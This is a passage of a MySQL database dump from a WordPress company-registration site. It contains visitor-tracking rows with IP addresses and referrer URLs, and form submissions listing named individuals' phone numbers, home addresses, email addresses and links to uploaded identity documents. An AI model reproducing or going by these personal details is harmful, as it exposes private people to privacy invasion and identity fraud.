action=edit'),(107,54,'user_ip_address','105.184.163.213'),(108,54,'http_referer','http://companyregistration.online/checkout-2/'),(109,55,'user_ip_address','105.227.141.205'),(110,55,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(111,56,'user_ip_address','105.227.141.205'),(112,56,'http_referer','http://companyregistration.online/checkout-2/'),(113,57,'user_ip_address','105.227.141.205'),(114,57,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(115,58,'user_ip_address','105.227.141.205'),(116,58,'http_referer','http://companyregistration.online/checkout-2/'),(117,59,'user_ip_address','105.227.141.205'),(118,59,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(119,60,'user_ip_address','105.227.141.205'),(120,60,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(121,61,'user_ip_address','105.227.141.205'),(122,61,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(123,62,'user_ip_address','105.227.141.205'),(124,62,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(125,63,'user_ip_address','105.227.141.205'),(126,63,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(127,64,'user_ip_address','105.227.141.205'),(128,64,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(129,65,'user_ip_address','105.227.141.205'),(130,65,'http_referer','http://companyregistration.online/checkout-2/'),(131,66,'user_ip_address','105.227.141.205'),(132,66,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(133,67,'user_ip_address','105.227.141.205'),(134,67,'http_referer','http://companyregistration.online/checkout-2/'),(135,68,'user_ip_address','105.227.141.205'),(136,68,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(137,69,'user_ip_address','105.227.141.205'),(138,69,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(139,70,'user_ip_address','105.227.141.205'),(140,70,'http_referer','http://companyregistration.online/checkout-2/'),(141,71,'user_ip_address','105.227.141.205'),(142,71,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(143,72,'user_ip_address','105.227.141.205'),(144,72,'http_referer','http://companyregistration.online/checkout-2/'),(145,73,'user_ip_address','105.227.141.205'),(146,73,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(147,74,'user_ip_address','105.227.141.205'),(148,74,'http_referer','http://companyregistration.online/checkout-2/'),(149,75,'user_ip_address','105.227.141.205'),(150,75,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(151,76,'user_ip_address','105.227.141.205'),(152,76,'http_referer','http://companyregistration.online/checkout-2/'),(153,77,'user_ip_address','105.227.141.205'),(154,77,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(155,78,'user_ip_address','105.227.141.205'),(156,78,'http_referer','http://companyregistration.online/wp-admin/post.php?post=30037&action=edit'),(157,79,'user_ip_address','105.227.141.205'),(158,79,'http_referer','http://companyregistration.online/wp-admin/post.php?post=30037&action=edit'),(159,80,'user_ip_address','105.227.141.205'),(160,80,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(161,81,'user_ip_address','105.227.141.205'),(162,81,'http_referer','http://companyregistration.online/checkout-2/'),(163,82,'user_ip_address','105.227.141.205'),(164,82,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(165,83,'user_ip_address','105.227.141.205'),(166,83,'http_referer','http://companyregistration.online/checkout-2/'),(167,84,'user_ip_address','105.227.141.205'),(168,84,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(169,85,'user_ip_address','105.227.141.205'),(170,85,'http_referer','http://companyregistration.online/thank-you-2/'),(171,86,'user_ip_address','105.227.141.205'),(172,86,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(173,87,'user_ip_address','105.227.141.205'),(174,87,'http_referer','http://companyregistration.online/checkout-2/?et_fb=1&PageSpeed=off'),(175,88,'user_ip_address','105.227.141.205'),(176,88,'http_referer','http://companyregistration.online/thank-you-2/?et_fb=1&PageSpeed=off'),(177,89,'user_ip_address','105.227.141.205'),(178,89,'http_referer','http://companyregistration.online/wp-admin/edit.php?post_type=cartflows_flow'),(179,90,'user_ip_address','105.227.141.205'),(180,90,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31362&action=edit'),(181,91,'user_ip_address','105.227.141.205'),(182,91,'http_referer','http://companyregistration.online/sa-company-registration/'),(183,92,'user_ip_address','105.227.141.205'),(184,92,'http_referer','http://companyregistration.online/sa-company-registration/?et_fb=1&PageSpeed=off'),(185,93,'user_ip_address','105.227.141.205'),(186,93,'http_referer','http://companyregistration.online/wp-admin/post.php?post=31300&action=edit'),(187,94,'user_ip_address','105.227.141.205'),(188,94,'http_referer','http://companyregistration.online/sa-company-registration/'),(189,95,'user_ip_address','105.227.141.205'),(190,95,'http_referer','http://companyregistration.online/sa-company-registration/'),(191,96,'user_ip_address','105.227.141.205'),(192,96,'http_referer','http://companyregistration.online/sa-company-registration/?et_fb=1&PageSpeed=off'),(193,97,'user_ip_address','165.255.71.127'),(194,98,'user_ip_address','165.255.71.127'),(195,98,'http_referer','http://companyregistration.online/sa-company-registration/'),(196,99,'user_ip_address','165.255.71.127'),(197,99,'http_referer','http://companyregistration.online/sa-company-registration/?et_fb=1&PageSpeed=off'),(198,100,'user_ip_address','165.255.71.127'),(199,100,'http_referer','http://companyregistration.online/sa-company-registration/'),(200,101,'user_ip_address','165.255.71.127'),(201,101,'http_referer','http://companyregistration.online/sa-company-registration/?et_fb=1&PageSpeed=off'),(202,102,'user_ip_address','165.255.71.127'),(203,103,'user_ip_address','165.255.71.127'),(204,103,'http_referer','http://companyregistration.online/thank-you-2/'),(205,104,'user_ip_address','165.255.71.127'),(206,104,'http_referer','http://companyregistration.online/thank-you-2/?et_fb=1&PageSpeed=off'),(207,105,'user_ip_address','165.255.71.127'),(208,105,'http_referer','http://companyregistration.online/sa-company-registration/?et_fb=1&PageSpeed=off'),(209,106,'user_ip_address','165.255.71.127'),(210,106,'http_referer','http://companyregistration.online/thank-you-2/?et_fb=1&PageSpeed=off'),(211,107,'user_ip_address','165.255.71.127'),(212,108,'user_ip_address','165.255.71.127'),(213,108,'http_referer','http://companyregistration.online/thank-you-coreg/'),(214,109,'user_ip_address','165.255.71.127'),(215,109,'http_referer','http://companyregistration.online/thank-you-coreg/?et_fb=1&PageSpeed=off'),(216,110,'user_ip_address','165.255.71.127'),(217,110,'http_referer','http://companyregistration.online/thank-you-coreg/?et_fb=1&PageSpeed=off'),(218,111,'user_ip_address','105.228.108.49'),(219,111,'http_referer','https://companyregistration.online/wp-admin/post.php?post=31300&action=edit'),(220,112,'user_ip_address','105.228.108.49'),(221,112,'http_referer','https://companyregistration.online/sa-company-registration/'),(222,113,'user_ip_address','105.228.108.49'),(223,113,'http_referer','https://companyregistration.online/sa-company-registration/'),(224,114,'user_ip_address','105.228.108.49'),(225,114,'http_referer','https://companyregistration.online/sa-company-registration/?et_fb=1&PageSpeed=off'),(226,115,'user_ip_address','105.228.108.49'),(227,115,'http_referer','https://companyregistration.online/wp-admin/post.php?post=31300&action=edit'),(228,116,'user_ip_address','105.228.108.49'),(229,116,'http_referer','https://companyregistration.online/sa-company-registration/'),(230,117,'user_ip_address','105.228.108.49'),(231,117,'http_referer','https://companyregistration.online/sa-company-registration/?et_fb=1&PageSpeed=off'),(232,118,'user_ip_address','105.228.108.49'),(233,118,'http_referer','https://companyregistration.online/wp-admin/post.php?post=31362&action=edit&revision=31665'),(234,119,'user_ip_address','105.228.108.49'),(235,119,'http_referer','https://companyregistration.online/sa-company-registration/'),(236,120,'user_ip_address','105.228.108.49'),(237,120,'http_referer','https://companyregistration.online/sa-company-registration/?et_fb=1&PageSpeed=off'),(238,121,'user_ip_address','105.184.144.39'),(239,122,'user_ip_address','66.249.83.95'),(240,123,'user_ip_address','66.249.83.65'),(241,124,'user_ip_address','66.249.83.95'),(242,125,'user_ip_address','66.249.83.65'),(243,126,'user_ip_address','66.249.89.178'),(244,127,'user_ip_address','66.249.89.180'),(245,128,'user_ip_address','66.249.89.182'),(246,129,'user_ip_address','66.249.89.178'),(247,130,'user_ip_address','66.249.89.180'),(248,131,'user_ip_address','66.249.89.178'),(249,132,'user_ip_address','66.249.89.178'),(250,133,'user_ip_address','66.249.89.178'),(251,134,'user_ip_address','66.249.89.178'),(252,135,'user_ip_address','66.249.89.178'),(253,136,'user_ip_address','66.249.89.178'),(254,137,'user_ip_address','66.249.89.178'),(255,138,'user_ip_address','66.249.89.178'),(256,139,'user_ip_address','66.249.89.178'),(257,140,'user_ip_address','165.255.71.127'),(258,141,'user_ip_address','105.187.240.11'),(259,141,'http_referer','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CCEQFjAF&url=https%3A%2F%2Fcompanyregistration.online%2Fsa-company-registration%2F&ei=T5k5XZDYGq3PHa-9AQ&usg=AFQjCNGrEXgikw4skcNO7lDzMCLWt4AeFw'),(260,142,'user_ip_address','196.23.168.134'),(261,142,'http_referer','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CEEQFjAA&url=https%3A%2F%2Fcompanyregistration.online%2Fsa-company-registration%2F&ei=UZk5XabbK_Kce_Rm&usg=AFQjCNGrEXgikw4skcNO7lDzMCLWt4AeFw'),(262,143,'user_ip_address','165.255.71.127'),(263,144,'user_ip_address','105.186.130.98'),(264,145,'user_ip_address','72.14.199.245'),(265,146,'user_ip_address','105.187.241.4'),(266,146,'http_referer','https://www.google.com/'),(267,147,'user_ip_address','72.14.199.245'),(268,148,'user_ip_address','105.186.131.6'),(269,149,'user_ip_address','196.50.230.86'),(270,149,'http_referer','android-app://com.google.android.gm'),(271,150,'user_ip_address','41.13.136.49'),(272,150,'http_referer','android-app://com.google.android.gm'),(273,151,'user_ip_address','41.13.136.49'),(274,151,'http_referer','android-app://com.google.android.gm'),(275,152,'user_ip_address','165.16.176.150'),(276,153,'user_ip_address','41.13.136.49'),(277,153,'http_referer','https://sandbox.payfast.co.za/eng/process/finish?p-sb=cqptv18l02h2dfphid5n40aun6'),(278,154,'user_ip_address','41.13.136.49'),(279,154,'http_referer','https://sandbox.payfast.co.za/eng/process/finish?p-sb=cqptv18l02h2dfphid5n40aun6'),(280,155,'user_ip_address','102.250.4.86'),(281,155,'http_referer','android-app://com.google.android.gm'),(282,156,'user_ip_address','169.159.154.37'),(283,156,'http_referer','android-app://com.google.android.gm'),(284,157,'user_ip_address','169.159.154.37'),(285,157,'http_referer','android-app://com.google.android.gm'),(286,158,'user_ip_address','197.229.5.22'),(287,159,'user_ip_address','105.4.3.33'),(288,160,'user_ip_address','105.4.3.33'),(289,161,'user_ip_address','105.4.3.33'),(290,162,'user_ip_address','105.4.3.33'),(291,162,'http_referer','https://companyregistration.online/sa-company-registration/'),(292,163,'user_ip_address','105.4.3.33'),(293,164,'user_ip_address','41.13.191.15'),(294,165,'user_ip_address','105.4.3.33'),(295,165,'http_referer','https://sandbox.payfast.co.za/eng/process/finish?p-sb=iee0ufot6pp5gjkdrvlt2habf2'),(296,166,'user_ip_address','197.228.50.191'),(297,167,'user_ip_address','102.250.0.151'),(298,168,'user_ip_address','102.250.0.197'),(299,169,'user_ip_address','102.250.0.168'),(300,170,'user_ip_address','102.250.0.250'),(301,170,'http_referer','https://companyregistration.online/sa-company-registration/'),(302,171,'user_ip_address','102.250.0.151'),(303,171,'http_referer','https://companyregistration.online/sa-company-registration/'),(304,172,'user_ip_address','102.250.0.151'),(305,172,'http_referer','https://companyregistration.online/sa-company-registration/'),(306,173,'user_ip_address','102.250.0.250'),(307,174,'user_ip_address','41.115.4.119'),(308,174,'http_referer','android-app://com.google.android.gm'),(309,175,'user_ip_address','41.115.58.73'),(310,175,'http_referer','android-app://com.google.android.gm'),(311,176,'user_ip_address','102.250.0.165'),(312,177,'user_ip_address','102.250.0.253'),(313,178,'user_ip_address','165.255.71.243'),(314,179,'user_ip_address','41.58.137.77'),(315,180,'user_ip_address','165.255.71.243'),(316,180,'http_referer','https://companyregistration.online/wp-admin/edit.php?post_type=cartflows_flow'),(317,181,'user_ip_address','165.255.71.243'),(318,181,'http_referer','https://sandbox.payfast.co.za/eng/process/finish?p-sb=2rloeh87j1jsiaho0jchg9bd01'),(319,182,'user_ip_address','165.255.71.243'),(320,182,'http_referer','https://companyregistration.online/wp-admin/edit.php?post_type=cartflows_flow'),(321,183,'user_ip_address','165.255.71.243'),(322,183,'http_referer','https://sandbox.payfast.co.za/eng/process/finish?p-sb=ae90412r86srhuv7bvn9jbujj1'),(323,184,'user_ip_address','165.255.71.243'),(324,184,'http_referer','https://companyregistration.online/wp-admin/edit.php?post_type=cartflows_flow'),(325,185,'user_ip_address','165.255.71.243'),(326,185,'http_referer','https://sandbox.payfast.co.za/eng/process/finish?p-sb=f37nt2nhkrc1cc6tjesofel8k1'),(327,186,'user_ip_address','72.14.199.245'),(328,187,'user_ip_address','105.187.240.4'),(329,187,'http_referer','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CDwQFjAF&url=https%3A%2F%2Fcompanyregistration.online%2Fsa-company-registration%2F&ei=dLNXXYCgKcy66wWgLw&usg=AFQjCNGrEXgikw4skcNO7lDzMCLWt4AeFw'),(330,188,'user_ip_address','72.14.199.245'),(331,189,'user_ip_address','41.13.108.152'),(332,190,'user_ip_address','41.13.108.152'),(333,191,'user_ip_address','165.255.168.137'),(334,191,'http_referer','https://companyregistration.online/wp-admin/post.php?post=31300&action=edit'),(335,192,'user_ip_address','165.255.168.137'),(336,192,'http_referer','https://companyregistration.online/wp-admin/post.php?post=31300&action=edit'),(337,193,'user_ip_address','165.255.168.137'),(338,193,'http_referer','https://companyregistration.online/wp-admin/post.php?post=31300&action=edit'),(339,194,'user_ip_address','41.13.124.103'),(340,195,'user_ip_address','165.255.168.137'),(341,195,'http_referer','https://companyregistration.online/wp-admin/edit.php?post_type=cartflows_flow'),(342,196,'user_ip_address','165.255.168.137'),(343,196,'http_referer','https://companyregistration.online/wp-admin/post.php?post=33135&action=edit'),(344,197,'user_ip_address','165.255.168.137'),(345,197,'http_referer','https://companyregistration.online/sa-company-registration-3/'),(346,198,'user_ip_address','165.255.168.137'),(347,198,'http_referer','https://companyregistration.online/sa-company-registration-3/'),(348,199,'user_ip_address','165.255.168.137'),(349,199,'http_referer','https://companyregistration.online/sa-company-registration-3/?et_fb=1&PageSpeed=off'),(350,200,'user_ip_address','165.255.168.137'),(351,200,'http_referer','https://companyregistration.online/wp-admin/edit.php?post_type=cartflows_flow'),(352,201,'user_ip_address','165.255.168.137'),(353,201,'http_referer','https://companyregistration.online/wp-admin/post.php?post=33134&action=edit'),(354,202,'user_ip_address','165.255.168.137'),(355,202,'http_referer','https://companyregistration.online/wp-admin/post.php?post=33134&action=edit'),(356,203,'user_ip_address','165.255.168.137'),(357,203,'http_referer','https://companyregistration.online/wp-admin/post.php?post=33134&action=edit'),(358,204,'user_ip_address','165.255.168.137'),(359,204,'http_referer','https://companyregistration.online/wp-admin/post.php?post=33134&action=edit'),(360,205,'user_ip_address','165.255.168.137'),(361,205,'http_referer','https://companyregistration.online/wp-admin/post.php?post=33134&action=edit'),(362,206,'user_ip_address','102.250.225.121'),(363,206,'http_referer','https://companyregistration.online/wp-admin/post.php?post=33134&action=edit'),(364,207,'user_ip_address','102.250.225.121'),(365,207,'http_referer','https://companyregistration.online/wp-admin/post.php?post=31300&action=edit'),(366,208,'user_ip_address','102.250.225.121'),(367,208,'http_referer','https://companyregistration.online/sa-company-registration/'),(368,209,'user_ip_address','102.250.225.121'),(369,209,'http_referer','https://companyregistration.online/sa-company-registration/'),(370,210,'user_ip_address','102.250.225.121'),(371,210,'http_referer','https://companyregistration.online/sa-company-registration/?et_fb=1&PageSpeed=off'),(372,211,'user_ip_address','102.250.225.121'),(373,211,'http_referer','https://companyregistration.online/sa-company-registration/'),(374,212,'user_ip_address','102.250.225.121'),(375,212,'http_referer','https://companyregistration.online/sa-company-registration/?et_fb=1&PageSpeed=off'),(376,213,'user_ip_address','165.255.168.137'),(377,213,'http_referer','https://companyregistration.online/sa-company-registration/'),(378,214,'user_ip_address','165.255.168.137'),(379,214,'http_referer','https://companyregistration.online/sa-company-registration/?et_fb=1&PageSpeed=off'),(380,215,'user_ip_address','165.255.168.137'),(381,215,'http_referer','https://companyregistration.online/wp-admin/post.php?post=31300&action=edit'),(382,216,'user_ip_address','165.255.168.137'),(383,216,'http_referer','https://companyregistration.online/wp-admin/post.php?post=31300&action=edit'),(384,217,'user_ip_address','165.255.168.137'),(385,217,'http_referer','https://companyregistration.online/wp-admin/post.php?post=31300&action=edit'),(386,218,'user_ip_address','165.255.168.137'),(387,218,'http_referer','https://companyregistration.online/wp-admin/edit.php?post_type=cartflows_flow');
/*!40000 ALTER TABLE `wpxb_cartflows_visits_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_cf_form_entries`
--

DROP TABLE IF EXISTS `wpxb_cf_form_entries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_cf_form_entries` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` varchar(18) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_id` int(11) NOT NULL,
  `datestamp` timestamp NOT NULL DEFAULT current_timestamp(),
  `status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'active',
  PRIMARY KEY (`id`),
  KEY `form_id` (`form_id`),
  KEY `user_id` (`user_id`),
  KEY `date_time` (`datestamp`),
  KEY `status` (`status`)
) ENGINE=MyISAM AUTO_INCREMENT=18 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_cf_form_entries`
--

LOCK TABLES `wpxb_cf_form_entries` WRITE;
/*!40000 ALTER TABLE `wpxb_cf_form_entries` DISABLE KEYS */;
INSERT INTO `wpxb_cf_form_entries` VALUES (1,'CF56f9267c4a9bd',1,'2016-03-28 18:13:44','trash'),(2,'CF56f9267c4a9bd',1,'2016-03-28 18:43:04','trash'),(3,'CF56f9267c4a9bd',1,'2016-03-29 15:01:39','trash'),(4,'CF56f9267c4a9bd',0,'2016-04-08 16:46:39','trash'),(5,'CF56f9709d16af8',0,'2016-04-08 18:17:55','active'),(6,'CF56f9267c4a9bd',0,'2016-04-08 18:22:40','trash'),(7,'CF56f9709d16af8',0,'2016-04-08 18:34:22','trash'),(8,'CF56f9709d16af8',0,'2016-04-08 18:37:13','trash'),(9,'CF56f9267c4a9bd',0,'2016-04-08 18:42:05','trash'),(10,'CF56f9267c4a9bd',0,'2016-04-08 18:47:22','trash'),(11,'CF56f9709d16af8',0,'2016-04-08 18:49:04','active'),(12,'CF56f9709d16af8',1,'2016-04-10 17:04:03','active'),(13,'CF5714b9a9ee4ba',1,'2016-04-18 15:01:14','active'),(14,'CF56f9709d16af8',0,'2017-03-21 10:45:53','trash'),(15,'CF56f9267c4a9bd',1,'2017-06-18 01:33:40','trash'),(16,'CF56f9267c4a9bd',1,'2017-06-18 10:28:09','active'),(17,'CF56f9709d16af8',3,'2017-07-05 13:28:57','active');
/*!40000 ALTER TABLE `wpxb_cf_form_entries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_cf_form_entry_meta`
--

DROP TABLE IF EXISTS `wpxb_cf_form_entry_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_cf_form_entry_meta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `entry_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `process_id` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `meta_key` (`meta_key`(250)),
  KEY `entry_id` (`entry_id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_cf_form_entry_meta`
--

LOCK TABLES `wpxb_cf_form_entry_meta` WRITE;
/*!40000 ALTER TABLE `wpxb_cf_form_entry_meta` DISABLE KEYS */;
INSERT INTO `wpxb_cf_form_entry_meta` VALUES (1,1,'fp_58905420','increment_value','10');
/*!40000 ALTER TABLE `wpxb_cf_form_entry_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_cf_form_entry_values`
--

DROP TABLE IF EXISTS `wpxb_cf_form_entry_values`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_cf_form_entry_values` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `entry_id` int(11) NOT NULL,
  `field_id` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `slug` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `form_id` (`entry_id`),
  KEY `field_id` (`field_id`),
  KEY `slug` (`slug`(250))
) ENGINE=MyISAM AUTO_INCREMENT=177 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_cf_form_entry_values`
--

LOCK TABLES `wpxb_cf_form_entry_values` WRITE;
/*!40000 ALTER TABLE `wpxb_cf_form_entry_values` DISABLE KEYS */;
INSERT INTO `wpxb_cf_form_entry_values` VALUES (1,1,'fld_8206916','insert_todays_date','2016-03-28'),(2,1,'fld_1571458','number_of_directors','One'),(3,1,'fld_6562030','proposed_company_name','ABC\r\nCDE\r\nGTR\r\nGTO'),(4,1,'fld_2828361','do_you_have_a_business_address','No'),(5,1,'fld_4045814','incorporator_or_1st_directors_full_name','Imraan Deeb'),(6,1,'fld_3416133','cell_phone_number_of_the_1st_director','(082)055-7080'),(7,1,'fld_3880152','physical_home_address_of_1st_director','112 Rose avenue'),(8,1,'fld_132545','suburb','Lenasia'),(9,1,'fld_8674929','province','Gauteng'),(10,1,'fld_9364351','postal_code','1820'),(11,1,'fld_734537','upload_certified_copies_of_director_idspassport','http://companyregistration.online/wp-content/uploads/2016/03/Imraan-ID0012.pdf'),(12,1,'fld_6786328','click_to_submit','click'),(13,2,'fld_8206916','insert_todays_date','2016-03-28'),(14,2,'fld_1571458','number_of_directors','One'),(15,2,'fld_6562030','proposed_company_name','ZTR\r\nFTR\r\nGYT'),(16,2,'fld_2828361','do_you_have_a_business_address','Yes'),(17,2,'fld_8860272','physical_address_of_the_company','112 Rose Avenue'),(18,2,'fld_1282952','suburb_of_business','Lenasia'),(19,2,'fld_7471073','province_of_business_address','Gautend'),(20,2,'fld_9752837','postal_code_of_business_address','1820'),(21,2,'fld_4045814','incorporator_or_1st_directors_full_name','Imraan Deen'),(22,2,'fld_3416133','cell_phone_number_of_the_1st_director','(082)055-7080'),(23,2,'fld_3880152','physical_home_address_of_1st_director','112 Rose'),(24,2,'fld_132545','suburb','Lenasia'),(25,2,'fld_8674929','province','Gauteng'),(26,2,'fld_9364351','postal_code','1820'),(27,2,'fld_734537','upload_certified_copies_of_director_idspassport','http://companyregistration.online/wp-content/uploads/2016/03/NetFlorist-Order-for-Hayley-Ryan.pdf'),(28,2,'fld_6786328','click_to_submit','click'),(29,3,'fld_8206916','insert_todays_date','2016-03-29'),(30,3,'fld_1571458','number_of_directors','One'),(31,3,'fld_6562030','proposed_company_name','ZAI\r\nIAQ\r\nDTR'),(32,3,'fld_2828361','do_you_have_a_business_address','No'),(33,3,'fld_4045814','incorporator_or_1st_directors_full_name','Imraan Deen'),(34,3,'fld_3416133','cell_phone_number_of_the_1st_director','(082)055-7080'),(35,3,'fld_3880152','physical_home_address_of_1st_director','112 Rose Avenue'),(36,3,'fld_132545','suburb','Leansia'),(37,3,'fld_8674929','province','gauteng'),(38,3,'fld_9364351','postal_code','1820'),(39,3,'fld_734537','upload_certified_copies_of_director_idspassport','http://companyregistration.online/wp-content/uploads/2016/03/Imraan-ID0012.pdf'),(40,3,'fld_6786328','click_to_submit','click'),(41,4,'fld_8206916','insert_todays_date','13-10-07'),(42,4,'fld_1571458','number_of_directors','One'),(43,4,'fld_6562030','proposed_company_name','ABC Logistics'),(44,4,'fld_2828361','do_you_have_a_business_address','Yes'),(45,4,'fld_8860272','physical_address_of_the_company','112 Rose Avenue '),(46,4,'fld_1282952','suburb_of_business','Johannesburg Lenasia'),(47,4,'fld_7471073','province_of_business_address','Gauteng'),(48,4,'fld_9752837','postal_code_of_business_address','1827'),(49,4,'fld_4045814','incorporator_or_1st_directors_full_name','Zainub Mahomed'),(50,4,'fld_3416133','cell_phone_number_of_the_1st_director','(082)080-8482'),(51,4,'fld_3880152','physical_home_address_of_1st_director','95 Agapanthus Avenue'),(52,4,'fld_132545','suburb','Johannesburg Lenasia'),(53,4,'fld_8674929','province','Gauteng'),(54,4,'fld_9364351','postal_code','1827'),(55,4,'fld_734537','upload_certified_copies_of_director_idspassport','http://companyregistration.online/wp-content/uploads/2016/04/Drivers-license.pdf'),(56,4,'fld_6786328','click_to_submit','click'),(57,5,'fld_8768091','first_name','Khizar'),(58,5,'fld_9970286','last_name','Khan'),(59,5,'fld_6009157','email_address','007.armaani@gmail.com'),(60,5,'fld_7683514','comments_questions','Well done Zainy the website looks absolutely amazing and creative. Very simple and to the point. Prices are extremely reasonable.'),(61,5,'fld_7908577','send_form','click'),(62,6,'fld_8206916','insert_todays_date','08/04/2016'),(63,6,'fld_1571458','number_of_directors','One'),(64,6,'fld_6562030','proposed_company_name','ABC Logistics'),(65,6,'fld_2828361','do_you_have_a_business_address','Yes'),(66,6,'fld_8860272','physical_address_of_the_company','112 Rose Avenue '),(67,6,'fld_1282952','suburb_of_business','Johannesburg Lenasia'),(68,6,'fld_7471073','province_of_business_address','Gauteng'),(69,6,'fld_9752837','postal_code_of_business_address','1827'),(70,6,'fld_4045814','incorporator_or_1st_directors_full_name','Zainub Mahomed'),(71,6,'fld_3416133','cell_phone_number_of_the_1st_director','(082)080-8482'),(72,6,'fld_3880152','physical_home_address_of_1st_director','95 Agapanthus Avenue'),(73,6,'fld_132545','suburb','Johannesburg Lenasia'),(74,6,'fld_8674929','province','Gauteng'),(75,6,'fld_9364351','postal_code','1827'),(76,6,'fld_734537','upload_certified_copies_of_director_idspassport','http://companyregistration.online/wp-content/uploads/2016/04/Drivers-license-1.pdf'),(77,6,'fld_6786328','click_to_submit','click'),(78,7,'fld_8768091','first_name','Zainub'),(79,7,'fld_9970286','last_name','Mahomed'),(80,7,'fld_6009157','email_address','zainubmaw@gmail.com'),(81,7,'fld_7683514','comments_questions','Well Done Imraan!'),(82,7,'fld_7908577','send_form','click'),(83,8,'fld_8768091','first_name','Zainub'),(84,8,'fld_9970286','last_name','Mahomed'),(85,8,'fld_6009157','email_address','zainubmaw@gmail.com'),(86,8,'fld_7683514','comments_questions','Well Done Imraan! Keep up the good work :)\r\n'),(87,8,'fld_7908577','send_form','click'),(88,9,'fld_8206916','insert_todays_date','13-10-07'),(89,9,'fld_1571458','number_of_directors','One'),(90,9,'fld_6562030','proposed_company_name','ABC Logistics'),(91,9,'fld_2828361','do_you_have_a_business_address','Yes'),(92,9,'fld_8860272','physical_address_of_the_company','112 Rose Avenue '),(93,9,'fld_1282952','suburb_of_business','Johannesburg Lenasia'),(94,9,'fld_7471073','province_of_business_address','Gauteng'),(95,9,'fld_9752837','postal_code_of_business_address','1827'),(96,9,'fld_4045814','incorporator_or_1st_directors_full_name','Zainub Mahomed'),(97,9,'fld_3416133','cell_phone_number_of_the_1st_director','(082)080-8482'),(98,9,'fld_3880152','physical_home_address_of_1st_director','95 Agapanthus Avenue'),(99,9,'fld_132545','suburb','Johannesburg Lenasia'),(100,9,'fld_8674929','province','Gauteng'),(101,9,'fld_9364351','postal_code','1827'),(102,9,'fld_734537','upload_certified_copies_of_director_idspassport','http://companyregistration.online/wp-content/uploads/2016/04/Drivers-license-2.pdf'),(103,9,'fld_6786328','click_to_submit','click'),(104,10,'fld_8206916','insert_todays_date','2016-04-08'),(105,10,'fld_1571458','number_of_directors','One'),(106,10,'fld_6562030','proposed_company_name','ABC LOGISTICS'),(107,10,'fld_2828361','do_you_have_a_business_address','Yes'),(108,10,'fld_8860272','physical_address_of_the_company','112 Rose Avenue '),(109,10,'fld_1282952','suburb_of_business','Johannesburg Lenasia'),(110,10,'fld_7471073','province_of_business_address','Gauteng'),(111,10,'fld_9752837','postal_code_of_business_address','1827'),(112,10,'fld_4045814','incorporator_or_1st_directors_full_name','Zainub Mahomed'),(113,10,'fld_3416133','cell_phone_number_of_the_1st_director','(082)080-8482'),(114,10,'fld_3880152','physical_home_address_of_1st_director','95 Agapanthus Avenue'),(115,10,'fld_132545','suburb','Johannesburg 